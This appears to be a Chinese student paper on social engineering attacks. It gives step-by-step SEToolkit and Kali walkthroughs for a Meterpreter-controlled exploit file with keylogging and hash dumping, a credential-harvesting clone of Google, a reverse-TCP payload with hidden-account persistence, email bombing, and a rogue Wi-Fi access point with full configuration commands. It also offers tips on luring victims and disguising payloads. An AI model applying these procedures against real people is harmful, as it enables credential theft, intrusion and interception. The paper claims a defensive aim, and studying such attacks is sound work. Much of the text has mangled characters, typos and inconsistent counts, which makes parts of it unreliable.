摘要:隨著軟硬件的快速發(fā)展,人本在享受物聯(lián)網(wǎng)帶來的簡易生活時,同時人的信息安全和財產(chǎn)安全變得更加重要,了解網(wǎng)絡(luò)中的攻擊手段就顯得更為重要,論文基于對社會工程學(xué)的攻擊原理進行分析,采取實踐應(yīng)用方法,將其攻擊流程和手段展示出來,最終目的是為保護信息安全提供基本依據(jù)和啟發(fā)。重點介紹了四種生活中普遍見到的社會工程學(xué)攻擊方式,并通過kalix操作系統(tǒng)和setoolkit攻擊套件進行實踐,給出攻擊方式的理念和方式,并展現(xiàn)其攻擊的多樣化。
關(guān)鍵詞:社會工程學(xué)攻擊;kali;棧溢出漏洞;網(wǎng)絡(luò)信息安全
中圖分類號:D918;TP393.08????????????文獻標(biāo)識碼:A
收稿日期:2020-05-22
作者簡介:高小輝(1997-),男,本科,研究方向:信息安全和算法分析。
通過介紹5種社會工程學(xué)攻擊方式:魚叉攻擊,釣魚攻擊,惡意媒介攻擊,群郵攻擊,展現(xiàn)各自的原理和獨特的實驗過程,對社會工程學(xué)和心理學(xué)的共同研究,展現(xiàn)不同的攻擊方式,向網(wǎng)絡(luò)安全人員提供參考,有助于實現(xiàn)信息安全的靶向治療。
1社會工程學(xué)的由來與發(fā)展
凱文.米特尼克是被認為社會工程學(xué)的奠基人好,他成功的將心理學(xué)融入其中,利用網(wǎng)民的社會行為和心里將其弱點暴露出來,讓一些技術(shù)探測工具有機可乘。
現(xiàn)代社會工程學(xué)與心理學(xué)能融合進一步加深,基于此一系列衍生工具和技術(shù),采用最基本的攻擊方式,攻擊者洞悉網(wǎng)民心理弱點,并利用心理弱點,繼而一些讓網(wǎng)民遭受巨大財產(chǎn)損失。
2社會工程學(xué)攻擊方式
2.1獵奇心理和魚叉式攻擊
當(dāng)人們遇到不知道,不熟悉或比較奇異的事物,常會不加思考的去接觸此類事物,而截取被攻擊的信息則是利用獵奇心理和較低的防患意識,當(dāng)人去瀏覽網(wǎng)頁和這下載文件,攻擊者事先利用人的獵奇心理,可以對文件名使用關(guān)于黃色,賺取巨額利潤等字眼或者利用當(dāng)下熱點新聞,使被攻擊者主動下載危險附件。危險附件的制作是基于棧溢出漏洞,由被攻擊者提前制作好或者直接利用被攻擊者系統(tǒng)本身自帶的棧溢出漏洞,這里首先介紹棧溢出漏洞原理和怎樣利用window XP存在的棧溢出漏洞程序來控制被攻擊機。
棧漏洞溢出是指在棧內(nèi)寫入超出長度的限制數(shù)據(jù),同時利用緩沖器溢出改寫數(shù)據(jù)和執(zhí)行流程,從而破壞程序的運行,獲得系統(tǒng)控制權(quán)的攻擊手段,這里涉及主要三個寄存器ESP ESP 和EIP.棧指針寄存器(extended?stack?pointer),其內(nèi)存放著一個指針,該指針永遠指向系統(tǒng)棧最上面一個棧幀的棧頂,基址指針寄存器(extended?base?pointer),其內(nèi)存放著一個指針,該指針永遠指向系統(tǒng)棧最上面一個棧幀的底部,EIP寄存器,用來存儲CPU要讀取指令的地址,CPU通過EIP寄存器讀取即將要執(zhí)行的指令。每次CPU執(zhí)行完相應(yīng)的匯編指令之后,EIP寄存器的值就會增加,如表1所示。
上述步驟生成了一個內(nèi)部含有攻擊代碼指令的文件,將其發(fā)布到網(wǎng)上,在這里攻擊對象是有Xp用戶下載,當(dāng)用戶下載完畢并打開時候,kali應(yīng)當(dāng)事先開啟主機進行監(jiān)測。啟動配套使用工具msfdb數(shù)據(jù)庫,并進入msfconsole控制臺,然后使用句柄設(shè)置載荷模塊,指定攻擊機的IP和端口,若成功建起攻擊機和被攻擊機的會話,可使用meterpreter模塊來獲得被攻擊機的系統(tǒng)控制權(quán),例如使用screenshot獲得被控制機的當(dāng)前屏幕的截圖,使用keycan_start和key_scan_dump獲取被控制機的鍵盤輸入記錄。另外還可以使用hashdump來獲得密碼的hash值,借助于Johnny進行哈希值的破解或者下載彩虹表進行攻擊,來取得被攻擊機的系統(tǒng)密碼。
2.2.釣魚攻擊
釣魚攻擊利用偽造的知名機構(gòu)來竊取賬戶名及其密碼,利用登陸者的行為慣性和盲目信任。在kali中setoolkit社會工程學(xué)中有完整的偽造知名網(wǎng)站的能力,現(xiàn)以主機A(A為公網(wǎng)ip)作為竊取主機,并在此主機上偽造www.google.com進而獲取登陸者的密碼和賬戶。
啟動setoolkit后,
第一步:選擇社會工程學(xué)攻擊,選定Social-Engineering Attacks;
第二步:選擇站點攻擊,選擇Website Attack Vectors;
第三步:選擇機密信息攻擊,站點克隆,選擇Credential Harvester Attack Method,選擇Site Cloner
Enter the url to clone:http://www.google.com
//這里我們選擇谷歌網(wǎng)站
第四步:配置監(jiān)聽主機。
IP address for the POST back in Harvester/Tabnabbing?:xxx.xxx.xx.xx
當(dāng)上述工作完成后,登陸者使用A登錄的時候,監(jiān)聽主機將獲得此登陸者的用戶名和密碼,如下圖所示:
釣魚攻擊的核心問題:如何使登陸者跳轉(zhuǎn)到一個自己不認識公網(wǎng)IP?這決定了釣魚攻擊的成敗?,F(xiàn)提出如下解決辦法:(1)對公網(wǎng)IP申請大量相似域名,進行公網(wǎng)IP和域名的綁定,這類方法較為耗費財力和人力進行維護,可以稱之為撒網(wǎng)式釣魚。(2)購買大量網(wǎng)站流量,來獲得較高的曝光率,有意的進行引流,從而在檢索排名靠前,可以稱之為緊縮網(wǎng)口。(3)欺詐郵箱,自動將自己主機相似域名大量轉(zhuǎn)發(fā),適合定向撈魚。(4)以超鏈接的方式,src屬性轉(zhuǎn)向自己的公網(wǎng)IP,而文本內(nèi)容卻是你偽造的網(wǎng)站地址。
2.3.創(chuàng)造惡意傳播媒介
將創(chuàng)造的惡意媒介,利用U盤或附加文件的形式下載到被攻擊機上,創(chuàng)造的惡意媒主動向監(jiān)聽機建立一個會話,使用Meterpreter創(chuàng)造出的攻擊載荷返回一個控制通道。另外防止被攻擊機進行漏洞處理,可以采用創(chuàng)建影子賬戶,或者創(chuàng)建隱藏賬戶來進行權(quán)限維持。
利用setoolkit實現(xiàn)方式:
第一步:選擇社會工程學(xué)攻擊。
選擇Social-Engineering Attacks
第二步:選擇創(chuàng)造惡意媒介,選擇逆向tcp連接,選擇Windows Shell Reverse_TCP
設(shè)置監(jiān)聽賬戶:IP address for payload listener:xxx.xxx.xx.xx。
第三步:將生成的payload.exe,autorun等文件進行偽裝,發(fā)布到被攻擊的主機上。
生成文件如下圖所示:
第四步:在被攻擊機主動或被動運行惡意媒介,攻擊機獲得被攻擊的控制權(quán),為防止漏洞處理,進行創(chuàng)建影子賬戶,分配最高權(quán)限。
添加賬戶:net user username password add。
一個關(guān)鍵核心問題,怎么偽裝或隱藏載荷文件,較好的方法:(1)利用當(dāng)下熱點新聞,利用網(wǎng)民的從眾心理,進行擴散式傳播文件。(2)偽裝成正常圖標(biāo),進行發(fā)布。發(fā)布的網(wǎng)站一般是不正規(guī)網(wǎng)站,但是持有大量流量,利用網(wǎng)民的占有欲望,麻木警覺。
2.4.群發(fā)郵件攻擊
大規(guī)模郵件攻擊是一種社會工程攻擊,其中大量的郵件是發(fā)送給受害者,以填滿其電子郵件收件箱和崩潰受害者的郵箱。 當(dāng)一封重要郵件到達受害者設(shè)備,而受害者并不知道這一點時,攻擊者發(fā)送大量的垃圾郵件,?如果收件箱沒有崩潰,垃圾郵件的發(fā)送量是如此之大,以至于重要的郵件隱藏在垃圾郵件中。 它也被稱為電子轟炸和短信攻擊。
實現(xiàn)方式:
第一步:選擇社會工程學(xué)攻擊,選擇Social-Engineering Attacks;
第二步:選擇群發(fā)郵件攻擊,生成郵件賬戶單。選擇Mass Mailer Attack,導(dǎo)入郵件賬戶單,選擇E-mail Attack Mass Mailer,導(dǎo)入路徑Path to the file to import into SET: /xx/xx/file;
第三步:設(shè)置私人個人賬戶作為發(fā)送郵件的賬戶。
Use a gamil?Account for your email attack
Your gmail email address:xxx@.com
Flag this message/s as high priority?Yes
#設(shè)置郵件優(yōu)先權(quán)為高
Do you want to attach a file - [y/n]: n
Do you want to attach an inline file - [y/n]: n
#這里我們選擇不添加附件,這里的附件經(jīng)常與病毒文件混合在一起,這里我們只是實現(xiàn)群郵攻擊
Email subject:xxx
Send the message as html or plain? 'h' or 'p' [p]:p
nter?the body of the message, type END (capitals) when finished:xxx
Next line of the body: END
#設(shè)置文件主題和內(nèi)容
第四步:測試群郵攻擊。
被攻擊賬戶郵件如圖,攻擊次數(shù)295次:
2.5?無線接入點引導(dǎo)攻擊
此類攻擊方式利用通過偽裝的wifi熱點,通常采用免費方式接入,引導(dǎo)人們接入wifi,當(dāng)用戶一旦接入,攻擊者便可截取一些私密信息,它的實現(xiàn)方式主要依賴于Kali系統(tǒng)三大工具,Airbase-ng,DHCP-server和Ettercap,Airbase-ng主要用于攻擊客戶端,例如,用于在無線接口上啟用和禁用監(jiān)聽模式,DHCP-SERVER用于給接入者分配IP,Ettercap用于嗅探數(shù)據(jù),進行中間人攻擊,在實踐中發(fā)現(xiàn),使用功率更大的無線網(wǎng)卡成功幾率更高,地點一般選擇比較繁華場所,熱點名稱應(yīng)具有誘惑性和迷惑性。
實現(xiàn)方式:
安裝主要服務(wù)套件 :
安裝dhcp讀?。簊udo apt-get install isc-dhcp-server
對isc-dhcp-server服務(wù)器進行基本配置:
配置方面主要涉及子網(wǎng)配置,DHCP和路由配置:
nano -w /etc/dhcp/dhcpd.conf
Default-lease-time 600;
#設(shè)置默認租約
max-lease-time 7200;
#設(shè)置最大租約
Ddns-update-style none
Authoritative;
#設(shè)置dhcp服務(wù)器為權(quán)威
Subet?192.168.1.0 netmask?255.255.255.0{
Range 192.168.1.3 192.168.140;
#配置分配ip范圍
Option domain-name-servers 192.168.1.1;
#配置dhcp服務(wù)器的ip地址
Option domain-name ?“example.org”
Option routers 192.168.1.1;
#設(shè)置路由ip,這里保持和dhcp一致。
Option subnet-mask 255.255.255.0;
}
3對外載網(wǎng)卡啟用監(jiān)聽模式,這里使用Ralink?802.11 n WLAN
在啟用前使用檢查airmon是否已經(jīng)開啟,避免沖突,這里直接檢查后直殺死進程
airmon-ng ?check
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
672 NetworkManager
1300 wpa_supplicant
airmon-ng ?check kill
Killing these processes
PID Name
_supplicant
4配置橋接網(wǎng)絡(luò)
將wifi熱點廣播,轉(zhuǎn)發(fā)到內(nèi)核網(wǎng)絡(luò)主要配置如下:
sudo ifconfig?at0?192.168.1.1 netmask?255.255.255.0
#設(shè)置有線接口卡at0,并且綁定到路由器
sudo ifconfig?at0 mtu?1400
#設(shè)置接收的數(shù)據(jù)塊大小,不能太小,否則接收異常
sudo route add -net 192.168.1.0 netmask?255.255.255.0 gw 192.168.1.1
#將路由添加到路由表上
sudo sh -c 'sudo echo 1 > /proc/sys/net/ipv4/ip_forward'
#設(shè)置ipv4轉(zhuǎn)發(fā)
sudo iptables?-t nat -A PREROUTING -p udp -j DNAT --to 192.168.43.1
#配置網(wǎng)關(guān)路由
sudo iptables?-P FORWARD ACCEPT
sudo iptables?--append FORWARD --in-interface at0 -j ACCEPT
sudo iptables?--table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
#注意這里設(shè)置外部連接網(wǎng)絡(luò)eth0,這一步有利于實現(xiàn)更加真實的欺騙,比如接入者不受感受到網(wǎng)絡(luò)的異常
sudo dhcpd?-cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
5查看欺騙wifi,并行行測試
手機客戶端掃描的wifi如圖所示,可以看到example.org
當(dāng)連接example.org wifi時,數(shù)據(jù)的劫持如圖所示。
5結(jié)語
社會工程學(xué)的攻擊方式與心理學(xué)的使用存在彼此關(guān)聯(lián)和聯(lián)系,從上述列舉了典型的社會工程學(xué)攻擊方式及其實現(xiàn)方式,社會工程學(xué)攻擊的實現(xiàn)的較為容易,但是一些殺毒軟件的防護愈發(fā)嚴格,漏斗補丁發(fā)布愈加頻繁,這對社會工程學(xué)的攻擊方式產(chǎn)生了較大的不利影響,但是從另一方面看,社會工程學(xué)的攻擊攻擊理念也在不斷改變,從技術(shù)和工具支持,轉(zhuǎn)向偏人的行為研究,并以此為基礎(chǔ),發(fā)展新的社會工程學(xué)攻擊技術(shù)和工具。
參考文獻:
[1]米特尼克,西蒙.反欺騙的藝術(shù)[M]..北京:清華大學(xué)出版社,2014.
[2]李華峰.Kali Linux 2網(wǎng)絡(luò)滲透測試實踐指南[M],北京:人民郵電出版社,2008.
[3]詹姆斯.F.庫羅斯.計算機網(wǎng)絡(luò)自頂向下方法[M].北京:機械工業(yè)出版社,2018.
Abstract: With the rapid development of software and hardware, when people are enjoying the simple life brought by the Internet of Things, at the same time, peoples information security and property security become more important, and it is more important to understand the attack methods in the network. The paper is based on It analyzes the attack principle of social engineering, adopts a practical application method, and displays its attack process and means. The ultimate goal is to provide basic basis and inspiration for protecting information security. It focuses on the four social engineering attack methods that are commonly seen in life, and is practiced through the kalix?operating system and setoolkit?attack suite. The concepts and methods of the attack methods are given, and the diversity of their attacks is demonstrated.
Key?words: Social engineering attack; Kali; Stack overflow vulnerability; Network information security